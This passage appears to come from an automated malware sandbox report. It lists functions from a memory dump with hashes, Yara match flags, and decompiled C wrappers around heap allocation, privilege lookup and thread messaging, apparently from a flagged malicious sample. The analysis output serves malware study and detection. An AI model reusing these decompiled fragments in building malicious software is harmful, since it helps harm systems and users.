                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418880, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;

				E004191B0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}




                                                0x00418897
                                                0x004188a2
                                                0x004188ad
                                                0x004188b1

                                                APIs
                                                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: &5A
                                                • API String ID: 1279760036-1617645808
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041A110( &_v67, 0, 0x3f);
				E0041ACF0( &_v68, 3);
				_t12 = E00409B30(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                0x0040728f
                                                0x00407293
                                                0x0040729e
                                                0x004072ae
                                                0x004072be
                                                0x004072c3
                                                0x004072ca
                                                0x004072cd
                                                0x004072da
                                                0x004072de
                                                0x004072fb
                                                0x004072fb
                                                0x00000000
                                                0x004072fd
                                                0x00407302

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004188C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                0x004188cf
                                                0x004188d7
                                                0x004188ed
                                                0x004188f1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418A1D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418A1D(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t13;

				_t10 = _a4;
				E004191B0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t13;
			}




                                                0x00418a23
                                                0x00418a3a
                                                0x00418a50
                                                0x00418a54

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 230345fddafc7c1142e560332d58448e30981c5bc08d36f350fb755b2e123772
                                                • Instruction ID: 91a00bbe38a7838b94ce213e5fbfdae2ee5a5183c342f51ec8d27c51e137ae99
                                                • Opcode Fuzzy Hash: 230345fddafc7c1142e560332d58448e30981c5bc08d36f350fb755b2e123772
                                                • Instruction Fuzzy Hash: ADE01AB16002046BEB10DF95DC84FE737AAAF88350F158155FA0DAB241CA35E855CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E004191B0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                0x00418a3a
                                                0x00418a50
                                                0x00418a54

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
